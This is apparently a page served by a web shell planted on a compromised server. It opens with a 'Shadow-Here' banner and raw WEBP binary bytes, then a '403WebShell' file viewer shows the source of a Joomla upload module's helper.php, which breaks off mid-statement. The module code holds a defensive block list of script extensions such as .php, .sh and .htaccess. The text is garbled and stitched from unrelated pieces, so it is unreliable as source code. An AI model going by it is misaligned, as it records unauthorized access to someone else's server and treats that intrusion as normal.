....................................../////.===Shadow-Here===./////................................................ > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < ------------------------------------------------------------------------------------------------------------------- /////////////////////////////////////////////////////////////////////////////////////////////////////////////////// RIFF¤ WEBPVP8 ˜ ðÑ *ôô>‘HŸK¥¤"§£±¨àð enü¹%½_F‘åè¿2ºQú³íªú`N¿­3ÿƒügµJžaÿ¯ÿ°~¼ÎùnúîÞÖô•òíôÁÉß®Sm¥Ü/ ‡ó˜f£Ùà<˜„xëJ¢Ù€SO3x<ªÔ©4¿+ç¶A`q@Ì“Úñè™ÍÿJÌ´ª-˜ÆtÊÛL]Ïq*‘Ý”ì#ŸÌÏãY]@ê`¿ /ªfkØB4·®£ó z—Üw¥Pxù–ÞLШKÇN¾AkÙTf½è'‰g gÆv›Øuh~ a˜Z— ïj*á¥t d£“uÒ ¨`K˜¹ßþ]b>˜]_ÏÔ6W—è2r4x•íÖ…"ƒÖNîä!¦å Ú}ýxGøÌ —@ ;ÆÚŠ=ɾ1ý8lªË¥ô ^yf®Œ¢u&2©nÙÇ›ñÂñŒ³ aPo['½»øFùà­+4ê“$!lövlüÞ=;N®3ð‚õ›DÉKòÞ>ÄÍ ¥ˆuߤ#ˆ$6ù™¥îЇy’ÍB¼ çxÛ;X"WL£R÷͝*ó-¶Zu}º.s¸sšXqù–DþÿvªhüïwyŸ ¯é³lÀ:KCûÄ£Ëá\…­ ~—ýóî ¼ûûÜTÓüÇy…ŽÆvc»¾×U ñ¸žþоP÷¦ó:Ò¨¨5;Ð#&#ÖúñläÿÁœ GxÉ­/ñ‡áQðìYÉtÒw޼GÔ´zàÒò ð*ëzƒ•4~H]Ø‹f ñÓÈñ`NåWçs'ÆÏW^ø¹!XžµmQ5ÃËoLœÎ: ÞËÍ¥J ù…î èo£ßPÎñ¶ž8.Œ]ʵ~5›ÙË-ù*8ÙÖß±~ ©¹rÓê‚j¶d¸{^Q'˜±Crß ÚH—#¥¥QlÀ×ëã‡DÜ«èî þ&Çæžî;ŽÏºò6ÒLÃXy&ZŒ'j‚¢Ù€IßÚù+–MGi‰*jE€‘JcÜ ÓÌ EÏÚj]o˜ Þr <¾U ûŪæÍ/šÝH¥˜b”¼ ÁñßX GP›ï2›4WŠÏà×£…íÓk†¦H·ÅíMh–*nó÷à]ÁjCº€b7<ب‹¨5車bp2:Á[UªM„QŒçiNMa#<5›áËó¸HýÊ"…×Éw¹¦ì2º–x<›»a±¸3Weü®FÝ⑱ö–î–³|LPÈ~çð~Çå‡|º kD¢µÏàÆAI %1À% ¹Ò – ”ϝS¦‰4&¶£°à Öý”û_Ò Áw°A«Å€?mÇÛgHÉ/8)á¾ÛìáöŽP í¨PŸNÙµº¦‡§Ùš"ÿ«>+ªÕ`Ê÷‡‚ß Õû˜þãÇ-PÍ.¾XV‘€ dÜ"þ4¹ ±Oú‘©t¥¦FªÄÃÄ•b‚znýu½—#cDs˜ÃiÑOˆñ×QO=*IAÊ,¶ŽZƒ;‡wøXè%EÐk:F±Ú” .Ѽ+Áu&Ç`."pÈÉw o&¿dE6‘’EqTuK@Ì¥ã™À(Êk(h‰,H}RÀIXÛš3µ1©_OqÚÒJAñ$ÊÙÜ;D3çŒ[þùœh¬Ã³™ö6ç†NY".Ú‰ï[ªŸŒ '²Ð öø_¨ÂÉ9ué¶³ÒŠõTàîMØ#û¯gN‡bÙ놚X„ö …ÉeüÌ^J ‹€.œ$Æ)βÄeæW#óüßĺŸ€ ÀzwV 9oä»f4V*uB «Ë†¹ì¯žR霓æHXa=&“I4K;¯ç‹h×·"UŠ~<•╪Vêª&ÍSÃÆÅ?ÔqÎ*mTM ˜›µwêd#[C¡©§‘D<©àb†–ÁœøvH/,í:¯( ²£|4-„Æövv„Yͼ™^Á$ˆ„¢Û[6yB.åH*V¨æ?$=˜Ñ€•ñ·­(VlŸ‘ nÀt8W÷´Bûba?q9ú¶Xƒl«ÿ\ù¶’þòUÐj/õ¢Ìµ³g$ƒÎR!¸»|Oߍë’BhîÚÑ¢ñåŒJ„®„£2Ð3•ô02Nt…!£Í]Ïc½Qÿ?ˆ<&ÃA¾Ú,JˆijÌ#5yz„‰Î|ÊŽ5QÏ:‹ÐaóVÔxW—CpeÏzÐïíçôÿÅ_[hãsÐ_/ŽTÝ?BîˆííV$<¿i>²F¬_Eß¿ †bÊŒº­ÿ®Z H“C}”¬,Mp 
ý/Bá£w>˜YV°aƒúh+cŠ- r/[%|üUMHäQ°X»|û/@|°¥Ð !BÔ Ç¢Ä©š+Õì D«7ìN¶ŽðÔ " ƶ’ÖçtA‰Û×}{tþz­¾GÍ›k¹OEJR$ Â׃ «ëÁ"oÉôž$oUK(Ä)Ãz³Ê-‹êN[Ò3Œñbï8P 4ƒ×q¢bo|?<ÛX¬òÄͰL–±›(™ûG?ýË©ÚÄ–ÂDØÐ_Ç¡ô ¾–ÄÏø ×e8Ë©$ÄF¹Å‹ì[©óìl:F¾f´‹‹Xì²ï®\¬ôùƒ ÿat¥óèÒùHß0äe‚;ü×h:ÆWðHž=Ã8骣"kœ'Y?³}Tûè€>?0l›e1Lòñ„aæKÆw…hÖŠùW…ÈÆÄ0ši·›[pcwËþñiêíY/~-Á5˜!¿†A›™Mÿþ(±“t@â“ö2­´TG5yé]çå僳 .·ÍïçÝ7UÚ±Ð/Nè»,_Ï ùdj7\ï Wì4›„»c¸àešg#ÒÊ⥭áØo5‘?ÌdÝô¯ ¹kzsƒ=´#ëÉK›Ø´±-¥eW?‡çßtòTã…$Ý+qÿ±ƒ÷_3Ô¥í÷:æ–ž<·Ö‡‰Å¢ š‡%Ô—utÌÈìðžgÖÀz²À—ï÷Óîäõ{K'´È÷³yaÏÁjƒô}ž§®æÊydÕÈë5¯èˆõvÕ©ã*çD„ “z„Ó‡^^xÂ3M§A´JG‚öï 3W'ˆ.OvXè¡ÊÕª?5º7†˜(˜Ç¶#çê’¶!ÌdZK§æ 0fãaN]òY³RV ™î$®K2R¨`W!1Ôó\;Ý ýB%qæK•&ÓÈe9È0êI±žeŸß -ú@žQr¦ ö4»M¼Áè¹µmw 9 EÆE_°2ó„ŸXKWÁ×Hóì^´²GѝF©óäR†¦‰ç"V»eØ<3ùd3ÿÚ¤Žú“Gi" —‘_ÙËÎ~Üö¯¥½Î»üŸEÚŽåmÞþí ;ÞólËΦMzA"Âf(´òá;Éï(/7½ûñÌ­cïÕçлþÝz¾-ÍvÑ“pH­–ðÓj$¸Äû¤‚‘ãUBË-n“2åPkS5&‹Â|+g^œ®Ì͆d!OïäîU«c;{Û!ÅŽ«ëZ9Ókóˆ]¯ƒ›né `ÇÒ+tÆš (ØKá¾—=3œ®•vuMñg²\ï Ec€ 05±d™‡×iÇ×›UúvÌ¢£Èþ¡ÕØô¶ßÎA"ß±#Ö²ˆÊŸ¦*Ä~ij|àø.-¼'»Ú¥£h ofº¦‡VsR=N½„Î v˜Z*SÌ{=jÑB‹tê…;’HžH¯8–îDù8ñ¢|Q•bÛçš–‹m³“ê¨ åÏ^m¬Žãþ©ïêO‡½6] µÆ„Ooòü ²x}N¦Ë3ïé¿»€›HA˜m%çÞ/¿í7Fø“‹léUk)É°Œµ8Q8›:ÀŠeT*šõ~ôڝG6 ¢}`ùH­–”¡k ‰P1>š†®9z11!X wKfmÁ¦xÑ,N1Q”–æB¶M…ÒÃv6SMˆhU¬ÊPŽï‘öj=·CŒ¯u¹ƒVIЃsx4’ömÛýcå¡¶7ßŠß 57^\wÒÐÆ k§h,Œý î«q^R½3]J¸ÇðN ‚çU¬ôº^Áì} ³f©Õœ§ˆã:FÄÈ‚é(€™?àýÓüè1Gô£¼éj‚OÅñ  #>×—ßtà 0G¥Åa뀐kßhc™À_ÉñÞ#±)GD" YîäË-ÿÙ̪ ¹™a¯´¢E\ÝÒö‚;™„ë]_ p8‰o¡ñ+^÷ 3‘'dT4œŽ ðVë½° :¬víÑ«£tßÚS-3¶“þ2 †üüʨòrš¹M{É_¤`Û¨0ìjœøJ‡:÷ÃáZ˜†@GP&œÑDGÏs¡þ¦þDGú‘1Yá9Ôþ¼ ûø…§÷8&–ÜÑnÄ_m®^üÆ`;ÉVÁJ£?â€-ßê}suÍ2sõA NÌúA磸‘îÿÚ»ƒìö·á¿±tÑÐ"Tÿü˜[@/äj¬€uüªìù¥Ý˜á8Ý´sõj 8@rˆð äþZÇD®ÿUÏ2ùôõrBzÆÏÞž>Ì™xœ“ wiÎ×7_… ¸ \#€MɁV¶¥üÕÿPÔ9Z‡ø§É8#H:ƒ5ÀÝå9ÍIŒ5åKÙŠ÷qÄ>1AÈøžj"µÂд/ªnÀ qªã}"iŸBå˜ÓÛŽ¦…&ݧ;G@—³b¯“•"´4í¨ôM¨åñC‹ïùÉó¯ÓsSH2Ý@ßáM‡ˆKÀªÛUeø/4\gnm¥‹ŸŒ qÄ b9ÞwÒNÏ_4Ég³ú=܆‚´ •â¥õeíþkjz>éÚyU«Íӝ݃6"8/ø{=Ô¢»G¥ äUw°W«,ô—¿ãㆅү¢³xŠUû™yŒ (øSópÐ 9\åTâ»—*oG$/×ÍT†Y¿1¤Þ¢_‡ ¼ „±ÍçèSaÓ 3ÛMÁBkxs‰’R/¡¤ˆÙçª(*õ„üXÌ´ƒ E§´¬EF"Ù”R/ÐNyÆÂ^°?™6¡œïJ·±$§?º>ÖüœcNÌù¯G ‹ñ2ЁBB„^·úìaz¨k:#¨Æ¨8LÎõލ£^§S&cŒÐU€ü(‡F±Š¼&P>8ÙÁ ‰ p5?0ÊÆƒZl¸aô š¼¡}gÿ¶zÆC²¹¬ÎÖG*HB¡O<º2#ñŒAƒ–¡B˜´É$¥›É:FÀÔx¾u?XÜÏÓvN©RS{2ʈãk9rmP¼Qq̳ è¼ÐFׄ^¡Öì 
fE“F4A…!ì/…¦Lƒ… … $%´¾yã@CI¬ á—3PþBÏNÿ<ý°4Ü ËÃ#ØÍ~âW«rEñw‹eùMMHß²`¬Öó½íf³:‹k˜¯÷}Z!ã¿<¥,\#öµÀ¯aÒNÆIé,Ћ–lŽ#Àæ9ÀÒS·I’½-Ïp Äz¤Š Â* ­íÄ9­< h>׍3ZkËU¹§˜ŒŠ±f­’¤º³Q ÏB?‹#µíÃ¥®@(Gs«†vI¥Mµ‹Á©e~2ú³ÁP4ìÕi‚²Ê^ö@-DþÓàlÜOÍ]n"µã:žpsŽ¢:! Aõ.ç~ÓBûH÷JCÌ]õVƒd «ú´QÙEA–¯¯Œ!.ˆˆëQ±ù œ·Ì!Õâ )ùL„ÅÀlÚè5@B…o´Æ¸XÓ&Û…O«˜”_#‡ƒ„ûÈt!¤ÁÏ›ÎÝŠ?c9 â\>lÓÁVÄÑ™£eØY]:fÝ–—ù+p{™ðè û³”g±OƒÚSù£áÁÊ„ä,ï7š²G ÕÌBk)~ÑiCµ|h#u¤¶îK¨² #²vݯGãeÖ϶ú…¾múÀ¶þÔñ‚Š9'^($¤§ò “š½{éúp÷J›ušS¹áªCÂubÃH9™D™/ZöØÁ‡¦ÝÙŸ·kð*_”.C‹{áXó€‡c¡c€§/šò/&éš÷,àéJþ‰X›fµ“C¨œ®r¬"kL‰Â_q…Z–.ÉL~O µ›zn‚¹À¦Öª7\àHµšÖ %»ÇníV[¥*Õ;ƒ#½¾HK-ÖIÊdÏEÚ#=o÷Óò³´Š: Ç?{¾+9›–‘OEáU·S€˜j"ÄaÜ ŒÛWt› á–c#a»pÔZÞdŽtWê=9éöÊ¢µ~ ë ;Öe‡Œ®:bî3±ýê¢wà¼îpêñ¹¾4 zc¾ðÖÿzdêŒÑÒŝÀ‰s6¤í³ÎÙB¿OZ”+F¤á‡3@Ñëäg©·Ž ˆèª<ù@É{&S„œÕúÀA)‰h:YÀ5^ÂÓŒ°õäU\ ùËÍû#²?Xe¬tu‰^zÒÔãë¼ÛWtEtû …‚g¶Úüâî*moGè¨7%u!]PhÏd™Ý%Îx: VÒ¦ôÊD3ÀŽKÛËãvÆî…N¯ä>Eró–ð`5 Œ%u5XkñÌ*NU%¶áœÊ:Qÿú»“úzyÏ6å-၇¾ ´ ÒÊ]y žO‘w2Äøæ…H’²f±ÎÇ.ª|¥'gîV•Ü .̘¯€šòü¤U~Ù†*¢!?ò wý,}´°ÔÞnïoKq5µb!áÓ3"vAßH¡³¡·G(ÐÎ0Îò¼MG!/ài®@—¬04*`…«é8ªøøló“ˆÊ”èù¤…ßÊoÿé'ËuÌÖ5×È¡§ˆˆfŽë9}hìâ_!!¯  B&Ëö¶‰ÀAÙNVŸ Wh›¸®XÑJì¨ú“¿÷3uj²˜¨ÍÎìë±aúŠÝå¯ð*Ó¨ôJ“yºØ)m°WýOè68†ŸÏ2—‰Ïüꪫٚ¥‹l1 ø ÏÄFjêµvÌbü¦èÝx:X±¢H=MÐß—,ˆÉÇ´(9ú¾^ÅÚ4¿m‡$âX‘å%(AlZo@½¨UOÌÕ”1ø¸jÎÀÃÃ_ µ‘Ü.œº¦Ut: Æï’!=¯uwû#,“pþÇúŒø(é@?³ü¥‘Mo §—s@Œ#)§ŒùkL}NOÆêA›¸~r½¼ÙA—HJ«eˆÖ´*¡ÓpÌŸö.m<-"³ûÈ$¬_6­åf£ïÚâj1y§ÕJ½@dÞÁr&Í\Z%D£Íñ·AZ Û³øüd/ªAi†/Й~  ‡âĮҮÏh§°b—›Û«mJžòG'[ÈYýŒ¦9psl ýÁ ®±f¦x,‰½tN ‚Xª9 ÙÖH.«Lo0×?͹m¡å†Ѽ+›2ƒF ±Ê8 7Hցϓ²Æ–m9…òŸï]Â1äN†VLâCˆU .ÿ‰Ts +ÅÎx(%¦u]6AF Š ØF鈄‘ |¢¶c±soŒ/t[a¾–û:s·`i햍ê›ËchÈ…8ßÀUÜewŒðNOƒõD%q#éû\9¤x¹&UE×G¥ Í—™$ð E6-‡¼!ýpãÔM˜ Âsìe¯ñµK¢Ç¡ùôléœ4Ö£”À Š®Ðc ^¨À}ÙËŸ§›ºê{ÊuÉC ×Sr€¤’fÉ*j!úÓ’Gsùìoîßîn%ò· àc Wp÷$¨˜)û»H ×8ŽÒ€Zj¤3ÀÙºY'Ql¦py{-6íÔCeiØp‘‡XÊîÆUߢ܂ž£Xé¼Y8þ©ëgñß}é.ÎógÒ„ÃØËø¯»™§Xýy M%@NŠ À(~áÐvu7&•,Ù˜ó€uP‡^^®=_E„jt’ 403WebShell
Current File : /var/www/web032/htdocs/cms/modules/mod_simplefileuploadv1.3/helper.php
<?php

// Entry-point guard: stop immediately unless the _JEXEC constant has been
// defined before this file was loaded, so a direct HTTP request to helper.php
// cannot execute any of the upload logic below.
if (!defined('_JEXEC')) {
	die('Direct Access to this location is not allowed.');
}


class ModSimpleFileUploaderHelperv13{	
	
	function getUploadForm(
			&$params,
			$upload_location,
			$sfu_basepath,
			$mid, 
			$upload_users,
			$users_name
		) {			
		
			// Get settings:
			$upload_maxsize = $params->get( 'upload_maxsize', '100000' );
			$upload_filetypes = $params->get( 'upload_filetypes', '' );
			$upload_fileexist = $params->get( 'upload_fileexist', '' );
			$upload_email = $params->get( 'upload_email', '' );
			$upload_emailmsg = $params->get( 'upload_emailmsg', '0' );
			$upload_emailhtml = $params->get( 'upload_emailhtml', '1' );
			$upload_unzip = $params->get( 'upload_unzip', '0' );
			$upload_showerrmsg = $params->get( 'upload_showerrmsg', '1' );
			$upload_showdircontent = $params->get( 'upload_showdircontent', '0' );
			$upload_popshowpath = $params->get( 'upload_popshowpath', '1' );
			$upload_popshowbytes = $params->get( 'upload_popshowbytes', '0' );
			$upload_blacklist = $params->get( 'upload_blacklist', '.php .php3 .php4 .php5 .php6 .phtml .pl .py .jsp .asp .htm .shtml .sh .cgi .exe .bat .cmd .htaccess' );
			$upload_doubleext = $params->get( 'upload_doubleext', '1' );
			$upload_phpext = $params->get( 'upload_phpext', '1' );
			$upload_gifcomment = $params->get( 'upload_gifcomment', '1' );
			$upload_mailfrom = $params->get( 'upload_mailfrom' , 'noreply@simplefileupload.com' );
			$upload_maximgwidth = $params->get( 'upload_maximgwidth', '0' );
			$upload_maximgheight = $params->get( 'upload_maximgheight', '0' );
			$upload_compressimg = $params->get( 'upload_compressimg', '' );
			$upload_disablegdlib = $params->get( 'upload_disablegdlib', '0' );
			$upload_disablegdthreshold = $params->get( 'upload_diablegdthreshold', '0' );
			
			$upload_thumbcreate = $params->get( 'upload_thumbcreate', '0' );
			$upload_thumbsize = $params->get( 'upload_thumbsize', '40x40' );
			$upload_thumbname = $params->get( 'upload_thumbname', 'sfuthumb' );
			$upload_debug = $params->get( 'upload_debug', '0' );
			
			$upload_formfields = $params->get( 'upload_formfields', '' );
			$upload_useformsfields = $params->get( 'upload_useformsfields', '0' );
			if ($upload_useformsfields == 0) 
				$upload_formfields = "";
			$upload_formfieldsfile = $params->get( 'upload_formfieldsfile', '' );
			$upload_formfieldsdiv = $params->get( 'upload_formfieldsdiv', '|' );
			
			$upload_nohtmlencoding = $params->get( 'upload_nohtmlencoding', '0' );
			$upload_replacetag = $params->get( 'upload_replacetag', '0' );
		    
			$results = "";
			$fileCnt = 0;
			$fileErr = 0;
			$written = 0;
			$filename = "";
			$fileList = "";
			$fileInfo = "";
			$filetypeok = true;
			$filetype = "";
			$blacklist = explode(" ", $upload_blacklist);
			$formfieldsval = array();
			$formfieldsemail = array();
			$chkfileexist = "";

			$baseurl = "";
			$serverurl = "";
			$protocol = "";
			$protocol = "http://";
		
			if (substr($_SERVER["HTTP_REFERER"], 0, 5) === "https") $protocol = "https://";
			$folder = substr($_SERVER['SCRIPT_NAME'], 0, strrpos($_SERVER['SCRIPT_NAME'], "/"));
			if ($folder === "//") $folder = "";
			// Check if relative path
			if (substr($upload_location, 0, 1) === ".") {
				$serverurl .= str_replace(".", $protocol.$_SERVER["HTTP_HOST"].$folder, $upload_location);
				// Fix Windows path...
				$baseurl .= str_replace("\\", "", $serverurl);
			} else {
				if ((substr($upload_location, 1, 2) === ":\\") || (substr($upload_location, 0, 1) === "/")) {
					// Server root path
					$baseurl = "file://".str_replace("\\", "/", $upload_location);
				} else {
					$serverurl = str_replace("\\", "/", $_SERVER["DOCUMENT_ROOT"]);
					$baseurl = str_replace("\\", "/", $upload_location);
					$baseurl = str_replace($serverurl, "", $baseurl);
					//$baseurl = dirname($_SERVER["HTTP_REFERER"])."/".$baseurl;
					$baseurl = $protocol.$_SERVER["HTTP_HOST"].$folder."/".$baseurl;
				}
			}
			//Replace space with %20 for URL
			$baseurl = str_replace(" ", "%20", $baseurl);
			// Make sure it ends with front slash
			if ( substr( $baseurl , strlen($baseurl) - 1) !== "/" ) {
				$baseurl .= "/";
			}
			
			if(is_array($_FILES["uploadedfile$mid"]["name"])) {
				foreach($_FILES["uploadedfile$mid"]["name"] as $value) {
					/* Not really useful since I need type and size as well... just use $_FILES
					if(strlen($value) > 0) {
						//Check that we have a filename
						$filenames[] = $value;
					}*/
					$fileCnt += 1;
				}
			}
			
			for ($cnt = 0; $cnt<$fileCnt; $cnt++) {
			
				if ((strlen($_FILES["uploadedfile$mid"]["name"][$cnt]) > 0) && ($upload_users === "true")) {
				
					// Check blacklist first
					foreach ($blacklist as $file) {
						$filename = $_FILES["uploadedfile$mid"]["name"][$cnt];
						
						if (preg_match("/$file\$/i", $filename)) {
							$filetypeok = false;
							break;
						}
					}
					
					// Check double extension
					if ($upload_doubleext === "1" || $upload_phpext === "1") {
					
						$exts = explode('.', $filename);
						// There is more than one dot!
						if (count($exts) > 2) {
							// Any double extension blocked
							if ($upload_doubleext === "1") 
								$filetypeok = false;
							
							if ($upload_phpext === "1") {
								// Block .php.
								if (strtolower($exts[count($exts)-2]) === "php") 
									$filetypeok = false;
							}
						} else {
							// Check and block any .php combination
							if (stripos($filename, ".php") !== false) 
								$filetypeok = false;
						}
					}
					
					
					if ($_FILES["uploadedfile$mid"]["error"][$cnt] > 0) {
						// Check if there was any error
						$filetypeok = false;
					}

					if ($filetypeok) {
						$fileList .= $_FILES["uploadedfile$mid"]["name"][$cnt] . "|";
						$filetype = $_FILES["uploadedfile$mid"]["type"][$cnt];
						$fileInfo .= "(" . JText::_('TYPE') . ": " . $filetype . " " . JText::_('SIZE') . ": " . $_FILES["uploadedfile$mid"]["size"][$cnt] . " " . JText::_('BYTES') . ")|";
						
						if ($filetype === "") $filetype = "false";
						if (stripos($upload_filetypes, $filetype) === false) {
							$filetypeok = false;
						} else {
							$filetypeok = true;
						}
						if ($upload_filetypes === "*") {
							$filetypeok = true;
						}
						
						//Check if GIF and block GIF Comment
						if ($upload_gifcomment === "1" && (preg_match("/.gif\$/i", $_FILES["uploadedfile$mid"]["name"][$cnt]))) {
						
							$comment = ModSimpleFileUploaderHelperv13::getGIFComment($_FILES["uploadedfile$mid"]["tmp_name"][$cnt], $upload_debug);
							if(stripos($comment, "getGIFComment:BLOCK") !== false) {
								$filetypeok = false;
							}
							if ($upload_debug == 1) $results .= $comment;
						
						}
						
					}
					
					if (($filetypeok) && ($_FILES["uploadedfile$mid"]["size"][$cnt] < $upload_maxsize)) {
						$errmsg = "";
						$new_filename = "";
						
						if ($_FILES["uploadedfile$mid"]["error"][$cnt] > 0) {
							if (($_FILES["uploadedfile$mid"]["size"][$cnt] == 0) && ($_FILES["uploadedfile$mid"]["error"][$cnt] == 2)) {
								$errmsg = "(<span style='color:#dd2222'>".$_FILES["uploadedfile$mid"]["name"][$cnt].")</span>".JText::sprintf('ERROR_TOO_BIG', "<br />[PHP Error: " . $_FILES["uploadedfile$mid"]["error"][$cnt]) . "]<br />";
							} else {
								$errmsg = "(<span style='color:#dd2222'>".$_FILES["uploadedfile$mid"]["name"][$cnt].")</span>".JText::sprintf('ERROR_LABEL', $_FILES["uploadedfile$mid"]["error"][$cnt]) . "<br />";
							}
							if ($upload_showerrmsg == 1) 
								$results .= $errmsg;
							else
								$results .= JText::_('UPLOAD_FAILED');
							$fileErr = 1;
						} else {
							$bytesfilesize = $_FILES["uploadedfile$mid"]["size"][$cnt];
							// Check to see if GD lib functions should be skipped
							if ($upload_disablegdthreshold > 0) {
								if ($bytesfilesize >= $upload_disablegdthreshold) $upload_disablegdlib = 1;
							}
					  		$filesize = ModSimpleFileUploaderHelperv13::getFileSizePP($bytesfilesize);
							if (($upload_popshowbytes == 1) && ($bytesfilesize != $filesize)) $filesize = $filesize . " (" . $bytesfilesize . " " . JText::_('BYTES') . ")";
							//$results .= "<strong>" . JText::_('FILE_OK_MSG') . "</strong><br /><br />";
							$results .= "<span style='color:#55dd55'>".JText::sprintf('FILE_UPLOAD_LABEL', $_FILES["uploadedfile$mid"]["name"][$cnt]) . "</span><br />";
							$results .= JText::sprintf('FILE_TYPE_LABEL', $_FILES["uploadedfile$mid"]["type"][$cnt]) . "<br />";
							$results .= JText::sprintf('FILE_SIZE_LABEL', $filesize) . "<br />";
							#$results .= "uploaded to: " . $_FILES["uploadedfile$mid"]["tmp_name"][$cnt] . "<br />";
					  		if (file_exists($upload_location . $_FILES["uploadedfile$mid"]["name"][$cnt])) {
								if ( $upload_fileexist === "0" ) {
									// FAIL
									$results .= "<br /><strong>" . JText::sprintf('FILE_EXISTS_MSG', $_FILES["uploadedfile$mid"]["name"][$cnt]) . "</strong><br /><br />" . JText::_('FILE_EXISTS_CORR');
									$fileErr = 1;
								}
								/* // Don't delete until new file has been created!
								if ( $upload_fileexist === "1" ) {
									// REPLACE
									unlink($upload_location . $_FILES["uploadedfile$mid"]["name"][$cnt]);
									$results .= JText::_('FILE_EXISTS_REPLACE') . "<br />";
									$chkfileexist = "no";
								}*/
								
								if ( $upload_fileexist === "2" || $upload_fileexist === "1" ) {
									// BACKUP
									$new_filename = $_FILES["uploadedfile$mid"]["name"][$cnt] . microtime();
									rename($upload_location . $_FILES["uploadedfile$mid"]["name"][$cnt], $upload_location . $new_filename);
									if ($upload_fileexist === "1")
										$results .= JText::_('FILE_EXISTS_REPLACE') . "<br />";
									else
										$results .= JText::sprintf('FILE_EXISTS_BACKUP',  $new_filename) . "<br />";
									$new_filename = $upload_location . $new_filename;
									$chkfileexist = "no";
								}
							} else {
								$chkfileexist = "no";
							}
							
							if ( $chkfileexist === "no" ) {
							
								// Resize and/or compress?
								$image_resize = false;
								$img_compressimg = 0;
								$img_maximgheight = 0;
								$img_maximgwidth = 0;
								// Check size of images before moving
								if (ModSimpleFileUploaderHelperv13::gd_get_info() && $upload_disablegdlib == 0) {
									
									if (($img = @getimagesize($_FILES["uploadedfile$mid"]["tmp_name"][$cnt])) && (((is_numeric($upload_maximgwidth) && $upload_maximgwidth > 0) || (is_numeric($upload_maximgheight) && $upload_maximgheight > 0)) || ($upload_thumbcreate == 1))) {
										list($width, $height, $type, $attr) = getimagesize($_FILES["uploadedfile$mid"]["tmp_name"][$cnt]);
									
										// Make sure we have a valid compression ratio
										if (!is_numeric($upload_compressimg) || $upload_compressimg > 100 || $upload_compressimg <= 0)
											$img_compressimg = 100;
										else
											$img_compressimg = $upload_compressimg;
								
										if ($upload_maximgheight == 0) 
											$img_maximgheight = $height;
										else
											$img_maximgheight = $upload_maximgheight;
											
										if ($upload_maximgwidth == 0)
											$img_maximgwidth = $width;
										else
											$img_maximgwidth = $upload_maximgwidth;
										
										$ratioh = $img_maximgheight/$height;
										$ratiow = $img_maximgwidth/$width;
										$ratio = min($ratioh, $ratiow);
										// New dimensions
										$n_width = intval($ratio*$width);
										$n_height = intval($ratio*$height); 
										
										$errmsg = "";
										switch ($type) {
											case 1: //'image/gif'
												if (imagetypes() & IMG_GIF)  { // not the same as IMAGETYPE
													$oim = imageCreateFromGIF($_FILES["uploadedfile$mid"]["tmp_name"][$cnt]) ;
												} else {
													$errmsg = "GIF ".JText::_('IMG_TYPE_FAIL')."<br />";
												}
												break;
											case 2: //'image/jpeg'
												if (imagetypes() & IMG_JPG)  {
													$oim = imageCreateFromJPEG($_FILES["uploadedfile$mid"]["tmp_name"][$cnt]) ;
												} else {
													$errmsg = "JPEG ".JText::_('IMG_TYPE_FAIL')."<br />";
												}
												break;
											case 3: //'image/png'
												if (imagetypes() & IMG_PNG)  {
													$oim = imageCreateFromPNG($_FILES["uploadedfile$mid"]["tmp_name"][$cnt]) ;
													$img_compressimg = round($img_compressimg / 10); // Quality is 0-9 for PNG
													if ($img_compressimg >= 10) $img_compressimg = 9; // If user has set quality to 100
												} else {
													$errmsg = "PNG ".JText::_('IMG_TYPE_FAIL')."<br />";
												}
												break;
											case 15: //'image/wbmp'
												if (imagetypes() & IMG_WBMP)  {
													$oim = imageCreateFromWBMP($_FILES["uploadedfile$mid"]["tmp_name"][$cnt]) ;
												} else {
													$errmsg = "WBMP ".JText::_('IMG_TYPE_FAIL')."<br />";
												}
												break;
											default:
												$errmsg = $type." ".JText::_('IMG_TYPE_FAIL')."<br />";
												break;
										}

										if ($errmsg === "") {

											// If thumbnail
											$thumbfilename = "";
											if ($upload_thumbcreate == 1) {

												$img_thumbsize = strtolower($upload_thumbsize);
												$img_thumbsize = explode("x", $img_thumbsize);
												if (is_array($img_thumbsize)) {
													if (count($img_thumbsize) == 2) {
														if (is_numeric($img_thumbsize[0]) && is_numeric($img_thumbsize[1])) {
															$ttim=imagecreatetruecolor($img_thumbsize[0],$img_thumbsize[1]);
															imagecopyresampled($ttim,$oim,0,0,0,0,$img_thumbsize[0],$img_thumbsize[1],$width,$height);
															$ext = substr(strrchr($_FILES["uploadedfile$mid"]["name"][$cnt], '.'), 1);
															$thumbfilename .= substr($_FILES["uploadedfile$mid"]["name"][$cnt], 0, (strlen($_FILES["uploadedfile$mid"]["name"][$cnt])-(strlen($ext) +1))) . "_" . $upload_thumbname . "." . $ext;
															// Make thumb as a link
															$results .= JText::_('IMG_THUMB_FILE') . ' <a href="'.$baseurl.str_replace(" ", "%20", $thumbfilename).'" target="blank">'.$thumbfilename.'</a><br/>';
															//$results .= JText::_('IMG THUMB FILE') . " " . $thumbfilename . "<br />";
															// Add path to thumb filename
															$thumbfilename = $upload_location . $thumbfilename;
														}
													}
												}
											}
											// Only thumbnail, no resize
											if ($upload_maximgheight !== 0 && $upload_maximgwidth !== 0) {
												$tim=imagecreatetruecolor($n_width,$n_height);
												imagecopyresampled($tim,$oim,0,0,0,0,$n_width,$n_height,$width,$height);
											}

											switch ($type) {
												case 1:
													// Only thumbnail, no resize
													if ($upload_maximgheight !== 0 && $upload_maximgwidth !== 0)
														imageGIF($tim, $upload_location . $_FILES["uploadedfile$mid"]["name"][$cnt]);
													if ($thumbfilename !== "") imageGIF($ttim, $thumbfilename);
													$image_resize = true;
													break;
												case 2:
													// Only thumbnail, no resize
													if ($upload_maximgheight !== 0 && $upload_maximgwidth !== 0)
														imageJPEG($tim, $upload_location . $_FILES["uploadedfile$mid"]["name"][$cnt], $img_compressimg);
													if ($thumbfilename !== "") imageJPEG($ttim, $thumbfilename);
													$img_compressimg = "";
													$image_resize = true;
													break;
												case 3:
													// Only thumbnail, no resize
													if ($upload_maximgheight !== 0 && $upload_maximgwidth !== 0)
														imagePNG($tim, $upload_location . $_FILES["uploadedfile$mid"]["name"][$cnt], $img_compressimg);
													if ($thumbfilename !== "") imagePNG($ttim, $thumbfilename);
													$img_compressimg = "";
													$image_resize = true;
													break;
												case 15:
													// Only thumbnail, no resize
													if ($upload_maximgheight !== 0 && $upload_maximgwidth !== 0)
														imageWBMP($tim, $upload_location . $_FILES["uploadedfile$mid"]["name"][$cnt]);
													if ($thumbfilename !== "") imageWBMP($ttim, $thumbfilename);
													break;
													$image_resize = true;
												default:
													$image_resize = false;
													break;
											}
												
											// Only thumbnail, no resize
											if ($upload_maximgheight !== 0 && $upload_maximgwidth !== 0) {
												imagedestroy($tim);
												if ($image_resize)
													$results .= JText::_('IMG_ORIG_RESIZE')."<br />";
												else
